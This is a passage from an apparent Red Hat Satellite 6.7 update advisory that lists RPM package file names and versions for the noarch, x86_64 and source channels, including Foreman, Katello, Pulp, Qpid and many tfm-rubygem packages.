fm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nRed Hat Satellite 6.7:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncandlepin-3.1.21-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nforeman-selinux-2.1.2.3-1.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npcp-mmvstatsd-0.4-2.el7sat.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-aiohttp-3.6.2-4.el7ar.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-async-timeout-3.0.1-2.el7ar.src.rpm\npython-attrs-19.3.0-3.el7ar.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-chardet-3.0.4-10.el7ar.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-dateutil-2.8.1-2.el7ar.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-idna-2.4-2.el7ar.src.rpm\npython-idna-ssl-1.1.0-2.el7ar.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-multidict-4.7.4-2.el7ar.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-prometheus-client-0.7.1-2.el7ar.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-receptor-satellite-1.2.0-1.el7sat.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-six-1.11.0-8.el7ar.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-typing-extensions-3.7.4.1-2.el7ar.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-yarl-1.4.2-2.el7ar.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nreceptor-0.6.3-1.el7ar.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm\nrubygem-facter-2.4.1-2.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nrubygem-passenger-4.0.18-24.el7sat.src.rpm\nrubygem-rack-1.6.12-1.el7sat.src.rpm\nrubygem-rake-0.9.2.2-41.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.src.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.src.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.src.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.src.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.src.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.src.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.src.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.src.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.src.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.src.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.src.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.src.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.src.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.src.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.src.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.src.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.src.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.src.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.src.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.src.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.src.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.src.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.src.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.src.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.src.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.src.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.src.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.src.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.src.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.src.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.src.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.src.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.src.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.src.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.src.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.src.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.src.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.src.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.src.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.src.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.src.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.src.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.src.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.src.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.src.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.src.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.src.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.src.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.src.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.src.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.src.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.src.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.src.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.src.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.src.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.src.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.src.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.src.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.src.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.src.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.src.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.src.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.src.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.src.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.src.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.src.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.src.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.src.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.src.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.src.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.src.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.src.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.src.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.src.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.src.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.src.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.src.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.src.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.src.rpm\